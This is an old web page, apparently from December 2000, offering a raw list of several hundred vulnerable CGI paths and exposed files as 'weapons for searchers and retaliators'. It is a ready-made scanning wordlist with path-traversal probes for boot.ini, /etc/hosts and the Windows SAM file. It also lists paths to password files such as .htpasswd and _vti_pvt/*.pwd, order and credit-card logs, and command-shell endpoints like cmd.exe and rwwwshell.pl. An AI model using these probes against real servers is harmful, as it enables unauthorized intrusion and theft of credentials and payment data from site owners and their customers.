A THIRD powerful "weak CGIs" list (December 2000) Courtesy of www.searchlores.org The incorrect use of the CGI scripts implies many vulnerabilities for the system hosting them. Another list with quite a lot of -ahem- interesting WEAK CGIs... a treasure-chest of interesting weapons for searchers and retaliators alike. /....../ all /....../config.sys /....../etc/hosts /../../../../ all /../../../../../../../boot.ini /../../../../../winnt/repair/sam._ /../../../../config.sys /../../../../etc/hosts /.access /.bash_history /.htaccess /.html/............./config.sys /.htpasswd /.passwd /ASPSamp/AdvWorks/equipment/catalog_type.asp /Admin_files/order.log /AdvWorks/equipment/catalog_type.asp /Orders/order.log /PDG_Cart/order.log /PDG_Cart/shopper.conf /PSUser/PSCOErrPage.htm /WebShop/logs/cc.txt /WebShop/logs/ck.log /WebShop/templates/cc.txt /_private /_vti_bin/_vti_aut/dvwssr.dll /_vti_bin/fpcount.exe /_vti_inf.html /_vti_pvt /_vti_pvt/administrators.pwd /_vti_pvt/authors.pwd /_vti_pvt/service.pwd /_vti_pvt/shtml.dll /_vti_pvt/shtml.exe /_vti_pvt/users.pwd /adsamples/config/site.csc /bin /carbo.dll /ccbill/secure/ccbill.log /cfdocs/cfmlsyntaxcheck.cfm /cfdocs/exampleapp/docs/sourcewindow.cfm /cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini /cfdocs/expelval/displayopenedfile.cfm /cfdocs/expelval/exprcalc.cfm /cfdocs/expelval/openfile.cfm /cfdocs/expelval/sendmail.cfm /cfdocs/snippets/fileexists.cfm /cfdocs/snippets/viewexample.cfm /cgi /cgi-bin /cgi-bin/AT-admin.cgi /cgi-bin/AT-generate.cgi /cgi-bin/Admin_files/order.log /cgi-bin/AnyForm2 /cgi-bin/Cgitest.exe /cgi-bin/Count.cgi /cgi-bin/FormHandler.cgi /cgi-bin/GW5/GWWEB.EXE /cgi-bin/UltraBoard.cgi /cgi-bin/UltraBoard.pl /cgi-bin/add_ftp.cgi /cgi-bin/adp /cgi-bin/adpassword.txt /cgi-bin/ads.setup /cgi-bin/aglimpse /cgi-bin/alibaba.pl /cgi-bin/allmanage.pl /cgi-bin/allmanage/adp /cgi-bin/allmanage/k /cgi-bin/allmanage/settings.cfg /cgi-bin/allmanage/userfile.dat /cgi-bin/allmanageup.pl /cgi-bin/anyboard.cgi /cgi-bin/architext_query.pl /cgi-bin/authorize/dbmfiles/users /cgi-bin/ax-admin.cgi /cgi-bin/ax.cgi /cgi-bin/bigconf.cgi all /cgi-bin/bizdb1-search.cgi /cgi-bin/bnbform.cgi /cgi-bin/cachemgr.cgi /cgi-bin/calender.pl /cgi-bin/calender_admin.pl /cgi-bin/campas /cgi-bin/cart.pl /cgi-bin/cgiwrap /cgi-bin/classifieds.cgi /cgi-bin/clickresponder.pl /cgi-bin/cmd.exe /cgi-bin/counterfiglet /cgi-bin/dbmlparser.exe /cgi-bin/dig.cgi /cgi-bin/dnewsweb /cgi-bin/edit.pl /cgi-bin/environ.cgi /cgi-bin/excite /cgi-bin/faxsurvey /cgi-bin/filemail.pl /cgi-bin/files.pl /cgi-bin/finger /cgi-bin/finger.pl /cgi-bin/formmail.pl /cgi-bin/fpcount.exe /cgi-bin/fpexplore.exe /cgi-bin/gH.cgi /cgi-bin/get32.exe /cgi-bin/glimpse /cgi-bin/guestbook.cgi /cgi-bin/handler /cgi-bin/htimage.exe /cgi-bin/htmlscript /cgi-bin/htsearch /cgi-bin/htsearch /cgi-bin/iisadmpwd/achg.htr /cgi-bin/iisadmpwd/aexp.htr /cgi-bin/iisadmpwd/aexp2.htr /cgi-bin/iisadmpwd/anot.htr /cgi-bin/imagemap.exe /cgi-bin/info2www /cgi-bin/infosrch.cgi /cgi-bin/input.bat /cgi-bin/input2.bat /cgi-bin/jj /cgi-bin/k /cgi-bin/loadpage.cgi /cgi-bin/mailform.exe /cgi-bin/maillist.pl /cgi-bin/makechanges/easysteps/easysteps.pl /cgi-bin/man.sh /cgi-bin/netstat /cgi-bin/nph-publish /cgi-bin/nph-test-cgi /cgi-bin/passwd /cgi-bin/passwd.txt /cgi-bin/perl.exe /cgi-bin/perlshop.cgi /cgi-bin/pfdispaly.cgi /cgi-bin/pfdisplay /cgi-bin/pfdisplay.cgi /cgi-bin/phf /cgi-bin/php.cgi /cgi-bin/plusmail /cgi-bin/postcard.pl /cgi-bin/printenv /cgi-bin/process_bug.cgi /cgi-bin/query /cgi-bin/responder /cgi-bin/rguest.exe /cgi-bin/rpm_query /cgi-bin/rwwwshell.pl /cgi-bin/search.cgi /cgi-bin/settings.cfg /cgi-bin/sojourn /cgi-bin/survey.cgi /cgi-bin/test-cgi /cgi-bin/test.bat /cgi-bin/textcounter.pl /cgi-bin/tpgnrock /cgi-bin/tst.bat /cgi-bin/tst.bat /cgi-bin/unlg1.1 /cgi-bin/unlg1.2 /cgi-bin/userfile.dat /cgi-bin/view-source /cgi-bin/visadmin.exe /cgi-bin/w3-msql/ /cgi-bin/webbbs.cgi /cgi-bin/webdist.cgi /cgi-bin/webplus /cgi-bin/websendmail /cgi-bin/webwho.pl /cgi-bin/wguest.exe /cgi-bin/whois_raw.cgi /cgi-bin/windmail.exe /cgi-bin/wrap /cgi-bin/www-sql /cgi-bin/wwwadmin.pl /cgi-bin/wwwboard.pl /cgi-dos/args.bat /cgi-dos/args.cmd /cgi-local /cgi-shl/win-c-sample.exe /cgi-src /cgi-src/phf.c /cgi-win /cgi-win/uploader.exe /cgibin /com1 /com2 /com3 /com4 /con/con /config/checks.txt /config/import.txt /config/mountain.cfg /config/orders.txt /default.asp. /default.asp::$DATA /doc /iisadmpwd/aexp2.htr /iishelp/iis/misc/iirturnh.htw /iissamples/exair/howitworks/codebrws.asp /iissamples/exair/search/advsearch.asp /iissamples/exair/search/qfullhit.htw /iissamples/exair/search/qsumrhit.htw /iissamples/iissamples/query.asp /iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /iissamples/sdk/asp/docs/codebrws.asp /log /logs /mall_log_files/order.log /manage/cgi/cgiproc /msadc/Samples/SELECTOR/showcode.asp /msadc/msadcs.dll /msads/Samples/SELECTOR/showcode.asp /ncl_items.html /order/order.log /orders/checks.txt /orders/import.txt /orders/mountain.cfg /orders/order.log /orders/orders.txt /ping all /ping?SomeCrapHere /piranha/secure/passwd.php3 /pw/storemgr.pw /quikstore.cfg /samples/search/queryhit.htm /scripts /scripts/CGImail.exe /scripts/c32web.exe/ChangeAdminPassword /scripts/cart32.exe/cart32clientlist /scripts/cmd.exe /scripts/convert.bas /scripts/counter.exe /scripts/dbman/db.cgi?db=invalid-db /scripts/emurl/RECMAN.dll /scripts/fpcount.exe /scripts/iisadmin/ism.dll?http/dir /scripts/issadmin/bdir.htr /scripts/no-such-file.pl /scripts/proxy/w3proxy.dll /scripts/slxweb.dll /scripts/tools/mkilog.exe /scripts/tools/newdsn.exe /scripts/uploadn.asp /scripts/wa.exe /scripts/webbbs.exe /scripts/wsisa.dll /search97.vts /server-status /showfile.asp /ssi/envout.bat /ws_ftp.ini /~ /~bin /~guest /~log /~logs /~lp /~named /~root /~test /~tmpGood luck, good hunt! 
Back to ideale3 |